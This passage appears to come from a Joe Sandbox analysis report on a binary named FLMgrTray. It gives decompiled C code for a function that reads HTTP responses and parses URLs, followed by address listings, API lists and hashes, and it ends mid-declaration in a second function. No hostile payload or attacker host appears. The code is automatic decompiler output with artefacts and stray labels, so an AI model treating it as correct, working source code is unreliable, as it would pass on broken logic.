                                                                                        • Instruction ID: d46f2cd6b684ba3e1040e3353058b8cc581f76cf84dea6c8c2de1f4787797440
                                                                                        • Opcode Fuzzy Hash: a10647e75253797c89e4d5552a5605bb431b95a340ec815c81a1545650a80ca2
                                                                                        • Instruction Fuzzy Hash: ED01C43150040D9B9B14EFA8DC495BD73A9DF15318B54079AF81ED76D0DF399E85CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 39%
                                                                                        			E00186EF0(intOrPtr __ecx, void* _a4, long _a8, signed int* _a12) {
                                                                                        				int _v8;
                                                                                        				signed int _v12;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				long _v28;
                                                                                        				char _v32;
                                                                                        				char _v36;
                                                                                        				intOrPtr _v44;
                                                                                        				intOrPtr _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				intOrPtr _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				intOrPtr _v64;
                                                                                        				intOrPtr* _v68;
                                                                                        				signed int _v80;
                                                                                        				char _v1036;
                                                                                        				void* _v1037;
                                                                                        				intOrPtr _v1044;
                                                                                        				intOrPtr _v1048;
                                                                                        				signed int _v1052;
                                                                                        				intOrPtr* _v1056;
                                                                                        				intOrPtr _v1060;
                                                                                        				intOrPtr _v1064;
                                                                                        				intOrPtr _v1068;
                                                                                        				short* _v1072;
                                                                                        				char _v1105;
                                                                                        				intOrPtr _v1120;
                                                                                        				intOrPtr _v1124;
                                                                                        				intOrPtr _v1128;
                                                                                        				intOrPtr _v1132;
                                                                                        				intOrPtr _v1136;
                                                                                        				intOrPtr _v1140;
                                                                                        				void* __ebp;
                                                                                        				signed int _t113;
                                                                                        				void* _t116;
                                                                                        				signed int _t119;
                                                                                        				intOrPtr _t126;
                                                                                        				int _t129;
                                                                                        				intOrPtr _t131;
                                                                                        				intOrPtr _t132;
                                                                                        				intOrPtr _t133;
                                                                                        				signed int _t134;
                                                                                        				signed int _t135;
                                                                                        				signed int _t136;
                                                                                        				signed int _t137;
                                                                                        				intOrPtr _t138;
                                                                                        				intOrPtr _t141;
                                                                                        				intOrPtr _t142;
                                                                                        				int _t145;
                                                                                        				intOrPtr _t155;
                                                                                        				intOrPtr _t159;
                                                                                        				int _t161;
                                                                                        				intOrPtr _t162;
                                                                                        				intOrPtr _t163;
                                                                                        				intOrPtr _t173;
                                                                                        				int _t175;
                                                                                        				intOrPtr _t176;
                                                                                        				intOrPtr _t177;
                                                                                        				intOrPtr _t178;
                                                                                        				intOrPtr _t182;
                                                                                        				int _t184;
                                                                                        				intOrPtr _t185;
                                                                                        				int _t186;
                                                                                        				signed int _t187;
                                                                                        				intOrPtr* _t191;
                                                                                        				intOrPtr* _t196;
                                                                                        				intOrPtr* _t198;
                                                                                        				intOrPtr* _t200;
                                                                                        				intOrPtr* _t202;
                                                                                        				intOrPtr* _t204;
                                                                                        				intOrPtr* _t206;
                                                                                        				intOrPtr _t207;
                                                                                        				void* _t209;
                                                                                        				intOrPtr* _t210;
                                                                                        				intOrPtr* _t211;
                                                                                        				void* _t215;
                                                                                        				intOrPtr* _t216;
                                                                                        				intOrPtr _t223;
                                                                                        				intOrPtr* _t226;
                                                                                        				intOrPtr* _t228;
                                                                                        				intOrPtr* _t230;
                                                                                        				void* _t233;
                                                                                        				void* _t235;
                                                                                        				intOrPtr* _t236;
                                                                                        				intOrPtr* _t238;
                                                                                        				intOrPtr* _t240;
                                                                                        				intOrPtr* _t242;
                                                                                        				intOrPtr* _t244;
                                                                                        				intOrPtr* _t246;
                                                                                        				void* _t252;
                                                                                        				void* _t253;
                                                                                        				void* _t254;
                                                                                        				void* _t255;
                                                                                        				void* _t256;
                                                                                        				void* _t258;
                                                                                        				void* _t259;
                                                                                        				intOrPtr* _t260;
                                                                                        				void* _t261;
                                                                                        				intOrPtr _t263;
                                                                                        				void* _t264;
                                                                                        				void* _t265;
                                                                                        				void* _t266;
                                                                                        				void* _t267;
                                                                                        				void* _t268;
                                                                                        				void* _t269;
                                                                                        				void* _t270;
                                                                                        				void* _t271;
                                                                                        				void* _t272;
                                                                                        				intOrPtr _t274;
                                                                                        				intOrPtr _t276;
                                                                                        				void* _t277;
                                                                                        				intOrPtr _t278;
                                                                                        				char* _t281;
                                                                                        				intOrPtr* _t282;
                                                                                        				intOrPtr _t283;
                                                                                        				void* _t286;
                                                                                        				intOrPtr _t287;
                                                                                        				intOrPtr _t288;
                                                                                        				void* _t289;
                                                                                        				void* _t291;
                                                                                        				void* _t293;
                                                                                        				intOrPtr _t294;
                                                                                        				void* _t298;
                                                                                        				signed int _t299;
                                                                                        				void* _t300;
                                                                                        				void* _t301;
                                                                                        
                                                                                        				_push(0xffffffff);
                                                                                        				_push(E0018E910);
                                                                                        				_push( *[fs:0x0]);
                                                                                        				_t299 = _t298 - 0x18;
                                                                                        				_t113 =  *0x19d05c; // 0x2c80d730
                                                                                        				_push(_t113 ^ _t296);
                                                                                        				 *[fs:0x0] =  &_v16;
                                                                                        				_v20 = _t299;
                                                                                        				_v24 = __ecx;
                                                                                        				_t116 =  *(__ecx + 0xc);
                                                                                        				_v28 = 0;
                                                                                        				_v8 = 0;
                                                                                        				if(_t116 == 0) {
                                                                                        					_push(0x199fac);
                                                                                        					_v32 = "connection failed...";
                                                                                        					_push( &_v32);
                                                                                        					L0018C89A();
                                                                                        					goto L5;
                                                                                        				} else {
                                                                                        					_t186 = InternetReadFile(_t116, _a4, _a8,  &_v28); // executed
                                                                                        					if(_t186 == 0) {
                                                                                        						L5:
                                                                                        						_push(0x199fac);
                                                                                        						_v36 = "response failed...";
                                                                                        						_push( &_v36);
                                                                                        						L0018C89A();
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						asm("int3");
                                                                                        						_t297 = _t299;
                                                                                        						_t300 = _t299 - 0x428;
                                                                                        						_t119 =  *0x19d05c; // 0x2c80d730
                                                                                        						_v80 = _t119 ^ _t299;
                                                                                        						_v1132 = _v60;
                                                                                        						_push(0);
                                                                                        						_t191 = _v68;
                                                                                        						_t196 = _t191;
                                                                                        						_v1136 = _v56;
                                                                                        						_push(_t285);
                                                                                        						_v1128 = _v52;
                                                                                        						_t252 = _t196 + 1;
                                                                                        						_t286 = 0;
                                                                                        						_push(_t273);
                                                                                        						_t274 = _v64;
                                                                                        						_v1124 = _v48;
                                                                                        						_v1120 = _t274;
                                                                                        						_v1140 = _v44;
                                                                                        						_v1105 = 0;
                                                                                        						do {
                                                                                        							_t126 =  *_t196;
                                                                                        							_t196 = _t196 + 1;
                                                                                        						} while (_t126 != 0);
                                                                                        						if(_t196 != _t252) {
                                                                                        							do {
                                                                                        								_t244 = _t191;
                                                                                        								_t271 = _t244 + 1;
                                                                                        								do {
                                                                                        									_t182 =  *_t244;
                                                                                        									_t244 = _t244 + 1;
                                                                                        								} while (_t182 != 0);
                                                                                        								if(_t286 < _t244 - _t271) {
                                                                                        									_t184 = strncmp(_t191 + _t286, ":", 1);
                                                                                        									_t300 = _t300 + 0xc;
                                                                                        									if(_t184 != 0) {
                                                                                        										_t246 = _t191;
                                                                                        										_t286 = _t286 + 1;
                                                                                        										_t272 = _t246 + 1;
                                                                                        										do {
                                                                                        											_t185 =  *_t246;
                                                                                        											_t246 = _t246 + 1;
                                                                                        										} while (_t185 != 0);
                                                                                        										goto L16;
                                                                                        									}
                                                                                        								}
                                                                                        								goto L17;
                                                                                        								L16:
                                                                                        							} while (_t246 != _t272);
                                                                                        						}
                                                                                        						L17:
                                                                                        						_t129 = strncmp(_t191 + 1 + _t286, "/", 1);
                                                                                        						_t198 = __imp__strncpy_s;
                                                                                        						_t301 = _t300 + 0xc;
                                                                                        						if(_t129 != 0) {
                                                                                        							if(_t274 != 0) {
                                                                                        								 *_t198(_t274, 5, "http", 4);
                                                                                        								_t301 = _t301 + 0x10;
                                                                                        								 *((char*)(_t274 + 5)) = 0;
                                                                                        							}
                                                                                        						} else {
                                                                                        							if(_t274 != 0) {
                                                                                        								_t39 = _t286 + 1; // 0x2
                                                                                        								 *_t198(_t274, _t39, _t191, _t286);
                                                                                        								_t301 = _t301 + 0x10;
                                                                                        								 *((char*)(_t274 + _t286)) = 0;
                                                                                        							}
                                                                                        						}
                                                                                        						_t43 = _t286 + 3; // 0x3
                                                                                        						_t276 =  ==  ? 0 : _t43;
                                                                                        						_t200 = _t191;
                                                                                        						_v1048 = _t276;
                                                                                        						_t253 = _t200 + 1;
                                                                                        						do {
                                                                                        							_t131 =  *_t200;
                                                                                        							_t200 = _t200 + 1;
                                                                                        						} while (_t131 != 0);
                                                                                        						_v1044 = _t276;
                                                                                        						_t287 = _t276;
                                                                                        						if(_t200 != _t253) {
                                                                                        							do {
                                                                                        								_t240 = _t191;
                                                                                        								_t269 = _t240 + 1;
                                                                                        								do {
                                                                                        									_t177 =  *_t240;
                                                                                        									_t240 = _t240 + 1;
                                                                                        								} while (_t177 != 0);
                                                                                        								if(_t287 < _t240 - _t269) {
                                                                                        									_t242 = _t191;
                                                                                        									_t287 = _t287 + 1;
                                                                                        									_t270 = _t242 + 1;
                                                                                        									do {
                                                                                        										_t178 =  *_t242;
                                                                                        										_t242 = _t242 + 1;
                                                                                        									} while (_t178 != 0);
                                                                                        									goto L32;
                                                                                        								}
                                                                                        								break;
                                                                                        								L32:
                                                                                        							} while (_t242 != _t270);
                                                                                        							_v1044 = _t287;
                                                                                        						}
                                                                                        						_t202 = _t191;
                                                                                        						_t254 = _t202 + 1;
                                                                                        						do {
                                                                                        							_t132 =  *_t202;
                                                                                        							_t202 = _t202 + 1;
                                                                                        						} while (_t132 != 0);
                                                                                        						if(_t287 < _t202 - _t254) {
                                                                                        							_t230 = _t191;
                                                                                        							_t294 = _t276;
                                                                                        							_t266 = _t230 + 1;
                                                                                        							do {
                                                                                        								_t163 =  *_t230;
                                                                                        								_t230 = _t230 + 1;
                                                                                        							} while (_t163 != 0);
                                                                                        							if(_t230 != _t266) {
                                                                                        								do {
                                                                                        									_t236 = _t191;
                                                                                        									_t267 = _t236 + 1;
                                                                                        									do {
                                                                                        										_t173 =  *_t236;
                                                                                        										_t236 = _t236 + 1;
                                                                                        									} while (_t173 != 0);
                                                                                        									if(_t276 < _t236 - _t267) {
                                                                                        										_t175 = strncmp(_t191 + _t294, ":", 1);
                                                                                        										_t301 = _t301 + 0xc;
                                                                                        										if(_t175 != 0) {
                                                                                        											_t238 = _t191;
                                                                                        											_t294 = _t294 + 1;
                                                                                        											_t268 = _t238 + 1;
                                                                                        											do {
                                                                                        												_t176 =  *_t238;
                                                                                        												_t238 = _t238 + 1;
                                                                                        											} while (_t176 != 0);
                                                                                        											goto L46;
                                                                                        										}
                                                                                        									}
                                                                                        									goto L47;
                                                                                        									L46:
                                                                                        								} while (_t238 != _t268);
                                                                                        							}
                                                                                        							L47:
                                                                                        							if(_t294 >= _v1044) {
                                                                                        								_t283 = _v1044;
                                                                                        							} else {
                                                                                        								_t233 = _t294 - _t276;
                                                                                        								__imp__strncpy_s(_v1064, _t233 + 1, _t276 + _t191, _t233);
                                                                                        								_t283 = _v1044;
                                                                                        								_t235 = _t283 - _t294;
                                                                                        								 *((char*)(_v1064 - _t276 + _t294 + 1)) = 0;
                                                                                        								__imp__strncpy_s(_v1068, _t235, _t191 + 1 + _t294, _t235 - 1);
                                                                                        								_t301 = _t301 + 0x20;
                                                                                        								 *((char*)(_v1068 - _t294 + _t283)) = 0;
                                                                                        							}
                                                                                        							_t276 = _t283 + 1;
                                                                                        							_v1048 = _t276;
                                                                                        						}
                                                                                        						_t204 = _t191;
                                                                                        						_v1044 = _t276;
                                                                                        						_t288 = _t276;
                                                                                        						_v1064 = _t288;
                                                                                        						_t255 = _t204 + 1;
                                                                                        						do {
                                                                                        							_t133 =  *_t204;
                                                                                        							_t204 = _t204 + 1;
                                                                                        						} while (_t133 != 0);
                                                                                        						if(_t204 != _t255) {
                                                                                        							do {
                                                                                        								_t226 = _t191;
                                                                                        								_t264 = _t226 + 1;
                                                                                        								do {
                                                                                        									_t159 =  *_t226;
                                                                                        									_t226 = _t226 + 1;
                                                                                        								} while (_t159 != 0);
                                                                                        								if(_t276 < _t226 - _t264) {
                                                                                        									_t161 = strncmp(_t191 + _t276, "/", 1);
                                                                                        									_t301 = _t301 + 0xc;
                                                                                        									if(_t161 != 0) {
                                                                                        										_t228 = _t191;
                                                                                        										_t276 = _t276 + 1;
                                                                                        										_t265 = _t228 + 1;
                                                                                        										do {
                                                                                        											_t162 =  *_t228;
                                                                                        											_t228 = _t228 + 1;
                                                                                        										} while (_t162 != 0);
                                                                                        										goto L61;
                                                                                        									}
                                                                                        								}
                                                                                        								break;
                                                                                        								L61:
                                                                                        							} while (_t228 != _t265);
                                                                                        							_v1048 = _t276;
                                                                                        						}
                                                                                        						if(_t288 > _t276) {
                                                                                        							L66:
                                                                                        							_t134 = _v1052;
                                                                                        							_t206 = "https";
                                                                                        							while(1) {
                                                                                        								_t256 =  *_t134;
                                                                                        								if(_t256 !=  *_t206) {
                                                                                        									break;
                                                                                        								}
                                                                                        								if(_t256 == 0) {
                                                                                        									L71:
                                                                                        									_t135 = 0;
                                                                                        								} else {
                                                                                        									_t263 =  *((intOrPtr*)(_t134 + 1));
                                                                                        									if(_t263 !=  *((intOrPtr*)(_t206 + 1))) {
                                                                                        										break;
                                                                                        									} else {
                                                                                        										_t134 = _t134 + 2;
                                                                                        										_t206 = _t206 + 2;
                                                                                        										if(_t263 != 0) {
                                                                                        											continue;
                                                                                        										} else {
                                                                                        											goto L71;
                                                                                        										}
                                                                                        									}
                                                                                        								}
                                                                                        								L74:
                                                                                        								_t207 = _v1044;
                                                                                        								_t258 = _t276 - _t207;
                                                                                        								_t289 = _t207 + _t191;
                                                                                        								_t93 = _t258 + 1; // 0x4
                                                                                        								_t277 = _t93;
                                                                                        								if(_t135 != 0) {
                                                                                        									_t136 = "ftp";
                                                                                        									while(1) {
                                                                                        										_t209 =  *_v1052;
                                                                                        										if(_t209 !=  *_t136) {
                                                                                        											break;
                                                                                        										}
                                                                                        										if(_t209 == 0) {
                                                                                        											L81:
                                                                                        											_t137 = 0;
                                                                                        										} else {
                                                                                        											_t223 =  *((intOrPtr*)(_v1052 + 1));
                                                                                        											if(_t223 !=  *((intOrPtr*)(_t136 + 1))) {
                                                                                        												break;
                                                                                        											} else {
                                                                                        												_v1052 = _v1052 + 2;
                                                                                        												_t136 = _t136 + 2;
                                                                                        												if(_t223 != 0) {
                                                                                        													continue;
                                                                                        												} else {
                                                                                        													goto L81;
                                                                                        												}
                                                                                        											}
                                                                                        										}
                                                                                        										L83:
                                                                                        										_t210 = _v1056;
                                                                                        										if(_t137 != 0) {
                                                                                        											 *_t210 = 0x50;
                                                                                        										} else {
                                                                                        											 *_t210 = 0x15;
                                                                                        										}
                                                                                        										goto L86;
                                                                                        									}
                                                                                        									asm("sbb eax, eax");
                                                                                        									_t137 = _t136 | 0x00000001;
                                                                                        									goto L83;
                                                                                        								} else {
                                                                                        									 *_v1056 = 0x1bb;
                                                                                        								}
                                                                                        								L86:
                                                                                        								__imp__strncpy_s(_v1060, _t277, _t289, _t258);
                                                                                        								goto L87;
                                                                                        							}
                                                                                        							asm("sbb eax, eax");
                                                                                        							_t135 = _t134 | 0x00000001;
                                                                                        							goto L74;
                                                                                        						} else {
                                                                                        							while(1) {
                                                                                        								_t281 = _t191 + _t288;
                                                                                        								_t145 = strncmp(_t281, ":", 1);
                                                                                        								_t301 = _t301 + 0xc;
                                                                                        								if(_t145 == 0) {
                                                                                        									break;
                                                                                        								}
                                                                                        								_t276 = _v1048;
                                                                                        								_t288 = _t288 + 1;
                                                                                        								if(_t288 <= _t276) {
                                                                                        									continue;
                                                                                        								} else {
                                                                                        									goto L66;
                                                                                        								}
                                                                                        								goto L87;
                                                                                        							}
                                                                                        							memset( &_v1036, 0, 0x400);
                                                                                        							_t84 =  &(_t281[1]); // 0x4
                                                                                        							_t282 = __imp__strncpy_s;
                                                                                        							 *_t282( &_v1036, 0x400, _t84, _v1048 - _t288);
                                                                                        							 *_v1056 = atoi( &_v1036);
                                                                                        							_t155 = _v1064;
                                                                                        							_t293 = _t288 - _t155;
                                                                                        							_t89 = _t293 + 1; // 0x4
                                                                                        							 *_t282(_v1060, _t89, _t155 + _t191, _t293);
                                                                                        						}
                                                                                        						L87:
                                                                                        						_t211 = _t191;
                                                                                        						_t259 = _t211 + 1;
                                                                                        						do {
                                                                                        							_t138 =  *_t211;
                                                                                        							_t211 = _t211 + 1;
                                                                                        						} while (_t138 != 0);
                                                                                        						_t278 = _v1048;
                                                                                        						if(_t278 >= _t211 - _t259) {
                                                                                        							 *_v1072 = 0x2f;
                                                                                        							return E001755F4(_v12 ^ _t297);
                                                                                        						} else {
                                                                                        							_t260 = _t191;
                                                                                        							_t215 = _t260 + 1;
                                                                                        							do {
                                                                                        								_t141 =  *_t260;
                                                                                        								_t260 = _t260 + 1;
                                                                                        							} while (_t141 != 0);
                                                                                        							_t261 = _t260 - _t215;
                                                                                        							_t216 = _t191;
                                                                                        							_t291 = _t216 + 1;
                                                                                        							do {
                                                                                        								_t142 =  *_t216;
                                                                                        								_t216 = _t216 + 1;
                                                                                        							} while (_t142 != 0);
                                                                                        							__imp__strncpy_s(_v1072, _t216 - _t291 - _t278 + 1, _t191 + _t278, _t261 - _t278);
                                                                                        							return E001755F4(_v12 ^ _t297);
                                                                                        						}
                                                                                        					} else {
                                                                                        						_t187 = _v28;
                                                                                        						 *_a12 = _t187;
                                                                                        						 *[fs:0x0] = _v16;
                                                                                        						return _t187 & 0xffffff00 | 0 == 0x00000000;
                                                                                        					}
                                                                                        				}
                                                                                        			}


































































































































                                                                                        0x00186ef3
                                                                                        0x00186ef5
                                                                                        0x00186f00
                                                                                        0x00186f01
                                                                                        0x00186f07
                                                                                        0x00186f0e
                                                                                        0x00186f12
                                                                                        0x00186f18
                                                                                        0x00186f1b
                                                                                        0x00186f1e
                                                                                        0x00186f23
                                                                                        0x00186f2a
                                                                                        0x00186f33
                                                                                        0x00186faa
                                                                                        0x00186fb2
                                                                                        0x00186fb9
                                                                                        0x00186fba
                                                                                        0x00000000
                                                                                        0x00186f35
                                                                                        0x00186f40
                                                                                        0x00186f48
                                                                                        0x00186fbf
                                                                                        0x00186fbf
                                                                                        0x00186fc7
                                                                                        0x00186fce
                                                                                        0x00186fcf
                                                                                        0x00186fd4
                                                                                        0x00186fd5
                                                                                        0x00186fd6
                                                                                        0x00186fd7
                                                                                        0x00186fd8
                                                                                        0x00186fd9
                                                                                        0x00186fda
                                                                                        0x00186fdb
                                                                                        0x00186fdc
                                                                                        0x00186fdd
                                                                                        0x00186fde
                                                                                        0x00186fdf
                                                                                        0x00186fe1
                                                                                        0x00186fe3
                                                                                        0x00186fe9
                                                                                        0x00186ff0
                                                                                        0x00186ff6
                                                                                        0x00186fff
                                                                                        0x00187000
                                                                                        0x00187003
                                                                                        0x00187005
                                                                                        0x0018700e
                                                                                        0x0018700f
                                                                                        0x00187015
                                                                                        0x0018701b
                                                                                        0x0018701d
                                                                                        0x0018701e
                                                                                        0x00187021
                                                                                        0x0018702a
                                                                                        0x00187030
                                                                                        0x00187036
                                                                                        0x00187040
                                                                                        0x00187040
                                                                                        0x00187042
                                                                                        0x00187043
                                                                                        0x00187049
                                                                                        0x00187050
                                                                                        0x00187050
                                                                                        0x00187052
                                                                                        0x00187055
                                                                                        0x00187055
                                                                                        0x00187057
                                                                                        0x00187058
                                                                                        0x00187060
                                                                                        0x0018706d
                                                                                        0x00187073
                                                                                        0x00187078
                                                                                        0x0018707a
                                                                                        0x0018707c
                                                                                        0x0018707d
                                                                                        0x00187080
                                                                                        0x00187080
                                                                                        0x00187082
                                                                                        0x00187083
                                                                                        0x00000000
                                                                                        0x00187080
                                                                                        0x00187078
                                                                                        0x00000000
                                                                                        0x00187087
                                                                                        0x00187087
                                                                                        0x00187050
                                                                                        0x0018708b
                                                                                        0x00187098
                                                                                        0x0018709e
                                                                                        0x001870a4
                                                                                        0x001870a9
                                                                                        0x001870c5
                                                                                        0x001870d1
                                                                                        0x001870d3
                                                                                        0x001870d6
                                                                                        0x001870d6
                                                                                        0x001870ab
                                                                                        0x001870ad
                                                                                        0x001870b1
                                                                                        0x001870b6
                                                                                        0x001870b8
                                                                                        0x001870bb
                                                                                        0x001870bb
                                                                                        0x001870bf
                                                                                        0x001870e2
                                                                                        0x001870e7
                                                                                        0x001870ea
                                                                                        0x001870ec
                                                                                        0x001870f2
                                                                                        0x001870f5
                                                                                        0x001870f5
                                                                                        0x001870f7
                                                                                        0x001870f8
                                                                                        0x001870fc
                                                                                        0x00187102
                                                                                        0x00187106
                                                                                        0x00187108
                                                                                        0x00187108
                                                                                        0x0018710a
                                                                                        0x00187110
                                                                                        0x00187110
                                                                                        0x00187112
                                                                                        0x00187113
                                                                                        0x0018711b
                                                                                        0x0018711d
                                                                                        0x0018711f
                                                                                        0x00187120
                                                                                        0x00187123
                                                                                        0x00187123
                                                                                        0x00187125
                                                                                        0x00187126
                                                                                        0x00000000
                                                                                        0x00187123
                                                                                        0x00000000
                                                                                        0x0018712a
                                                                                        0x0018712a
                                                                                        0x0018712e
                                                                                        0x0018712e
                                                                                        0x00187134
                                                                                        0x00187136
                                                                                        0x00187140
                                                                                        0x00187140
                                                                                        0x00187142
                                                                                        0x00187143
                                                                                        0x0018714b
                                                                                        0x00187151
                                                                                        0x00187153
                                                                                        0x00187155
                                                                                        0x00187158
                                                                                        0x00187158
                                                                                        0x0018715a
                                                                                        0x0018715b
                                                                                        0x00187161
                                                                                        0x00187163
                                                                                        0x00187163
                                                                                        0x00187165
                                                                                        0x00187168
                                                                                        0x00187168
                                                                                        0x0018716a
                                                                                        0x0018716b
                                                                                        0x00187173
                                                                                        0x00187180
                                                                                        0x00187186
                                                                                        0x0018718b
                                                                                        0x0018718d
                                                                                        0x0018718f
                                                                                        0x00187190
                                                                                        0x00187193
                                                                                        0x00187193
                                                                                        0x00187195
                                                                                        0x00187196
                                                                                        0x00000000
                                                                                        0x00187193
                                                                                        0x0018718b
                                                                                        0x00000000
                                                                                        0x0018719a
                                                                                        0x0018719a
                                                                                        0x00187163
                                                                                        0x0018719e
                                                                                        0x001871a4
                                                                                        0x001871fe
                                                                                        0x001871a6
                                                                                        0x001871ab
                                                                                        0x001871b9
                                                                                        0x001871c7
                                                                                        0x001871cf
                                                                                        0x001871d1
                                                                                        0x001871e7
                                                                                        0x001871f3
                                                                                        0x001871f8
                                                                                        0x001871f8
                                                                                        0x00187204
                                                                                        0x00187205
                                                                                        0x00187205
                                                                                        0x0018720b
                                                                                        0x0018720d
                                                                                        0x00187213
                                                                                        0x00187215
                                                                                        0x0018721b
                                                                                        0x00187220
                                                                                        0x00187220
                                                                                        0x00187222
                                                                                        0x00187223
                                                                                        0x00187229
                                                                                        0x00187230
                                                                                        0x00187230
                                                                                        0x00187232
                                                                                        0x00187235
                                                                                        0x00187235
                                                                                        0x00187237
                                                                                        0x00187238
                                                                                        0x00187240
                                                                                        0x0018724d
                                                                                        0x00187253
                                                                                        0x00187258
                                                                                        0x0018725a
                                                                                        0x0018725c
                                                                                        0x0018725d
                                                                                        0x00187260
                                                                                        0x00187260
                                                                                        0x00187262
                                                                                        0x00187263
                                                                                        0x00000000
                                                                                        0x00187260
                                                                                        0x00187258
                                                                                        0x00000000
                                                                                        0x00187267
                                                                                        0x00187267
                                                                                        0x0018726b
                                                                                        0x0018726b
                                                                                        0x00187273
                                                                                        0x00187298
                                                                                        0x00187298
                                                                                        0x0018729e
                                                                                        0x001872a3
                                                                                        0x001872a3
                                                                                        0x001872a7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001872af
                                                                                        0x001872c3
                                                                                        0x001872c3
                                                                                        0x001872b1
                                                                                        0x001872b1
                                                                                        0x001872b7
                                                                                        0x00000000
                                                                                        0x001872b9
                                                                                        0x001872b9
                                                                                        0x001872bc
                                                                                        0x001872c1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x001872c1
                                                                                        0x001872b7
                                                                                        0x00187335
                                                                                        0x00187335
                                                                                        0x0018733d
                                                                                        0x0018733f
                                                                                        0x00187342
                                                                                        0x00187342
                                                                                        0x00187347
                                                                                        0x00187357
                                                                                        0x00187360
                                                                                        0x00187366
                                                                                        0x0018736a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018736e
                                                                                        0x0018738c
                                                                                        0x0018738c
                                                                                        0x00187370
                                                                                        0x00187376
                                                                                        0x0018737c
                                                                                        0x00000000
                                                                                        0x0018737e
                                                                                        0x0018737e
                                                                                        0x00187385
                                                                                        0x0018738a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018738a
                                                                                        0x0018737c
                                                                                        0x00187395
                                                                                        0x00187395
                                                                                        0x0018739d
                                                                                        0x001873a7
                                                                                        0x0018739f
                                                                                        0x0018739f
                                                                                        0x0018739f
                                                                                        0x00000000
                                                                                        0x0018739d
                                                                                        0x00187390
                                                                                        0x00187392
                                                                                        0x00000000
                                                                                        0x00187349
                                                                                        0x0018734f
                                                                                        0x0018734f
                                                                                        0x001873ad
                                                                                        0x001873b6
                                                                                        0x00000000
                                                                                        0x001873bc
                                                                                        0x00187330
                                                                                        0x00187332
                                                                                        0x00000000
                                                                                        0x00187275
                                                                                        0x00187275
                                                                                        0x00187277
                                                                                        0x00187280
                                                                                        0x00187286
                                                                                        0x0018728b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x0018728d
                                                                                        0x00187293
                                                                                        0x00187296
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00187296
                                                                                        0x001872d5
                                                                                        0x001872e3
                                                                                        0x001872e6
                                                                                        0x001872f9
                                                                                        0x0018730e
                                                                                        0x00187310
                                                                                        0x00187316
                                                                                        0x0018731c
                                                                                        0x00187326
                                                                                        0x00187328
                                                                                        0x001873bf
                                                                                        0x001873bf
                                                                                        0x001873c1
                                                                                        0x001873c4
                                                                                        0x001873c4
                                                                                        0x001873c6
                                                                                        0x001873c7
                                                                                        0x001873cb
                                                                                        0x001873d5
                                                                                        0x00187431
                                                                                        0x0018743f
                                                                                        0x001873d7
                                                                                        0x001873d7
                                                                                        0x001873d9
                                                                                        0x001873e0
                                                                                        0x001873e0
                                                                                        0x001873e2
                                                                                        0x001873e3
                                                                                        0x001873e7
                                                                                        0x001873e9
                                                                                        0x001873eb
                                                                                        0x001873f0
                                                                                        0x001873f0
                                                                                        0x001873f2
                                                                                        0x001873f3
                                                                                        0x0018740a
                                                                                        0x00187423
                                                                                        0x00187423
                                                                                        0x00186f4a
                                                                                        0x00186f8e
                                                                                        0x00186f91
                                                                                        0x00186f99
                                                                                        0x00186fa7
                                                                                        0x00186fa7
                                                                                        0x00186f48

                                                                                        APIs
                                                                                        • InternetReadFile.WININET(?,00000400,?,00000000), ref: 00186F40
                                                                                        • _CxxThrowException.VCRUNTIME140(?,00199FAC,2C80D730,?), ref: 00186FBA
                                                                                        • _CxxThrowException.VCRUNTIME140(?,00199FAC,?,00199FAC,2C80D730,?), ref: 00186FCF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000017.00000002.771659906.0000000000161000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00160000, based on PE: true
                                                                                        • Associated: 00000017.00000002.771635853.0000000000160000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771755110.000000000018F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771801534.000000000019D000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                        • Associated: 00000017.00000002.771814639.000000000019F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_23_2_160000_FLMgrTray.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionThrow$FileInternetRead
                                                                                        • String ID:
                                                                                        • API String ID: 2160620701-0
                                                                                        • Opcode ID: dc4f39f746a76bdf9e7336fa928ada9ab9463448c8bc7d4d0be7fea53fb4c500
                                                                                        • Instruction ID: 0ce32bf71a6ad74cf3fb524bb22ff2394c32ac19d1103da38731474631e0f9d0
                                                                                        • Opcode Fuzzy Hash: dc4f39f746a76bdf9e7336fa928ada9ab9463448c8bc7d4d0be7fea53fb4c500
                                                                                        • Instruction Fuzzy Hash: 9F113D72A41209ABCF00DFA5DC45BDEFBB8FB09714F10455AF911A3240D7799605CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 67%
                                                                                        			E0016F500(void* __ebx, void* __edi, char* _a4) {
                                                                                        				char _v8;
                                                                                        				char _v16;
                                                                                        				signed int _v20;
                                                                                        				char _v52;
                                                                                        				char _v10420;
                                                                                        				intOrPtr _v10424;
                                                                                        				char _v10428;
                                                                                        				char _v10444;
                                                                                        				intOrPtr _v10448;
                                                                                        				char _v10452;
                                                                                        				char _v10468;
                                                                                        				char _v10472;
                                                                                        				void* __ebp;
                                                                                        				signed int _t37;
                                                                                        				signed int _t38;
                                                                                        				char* _t41;
                                                                                        				intOrPtr* _t44;
                                                                                        				intOrPtr _t48;
                                                                                        				void* _t51;
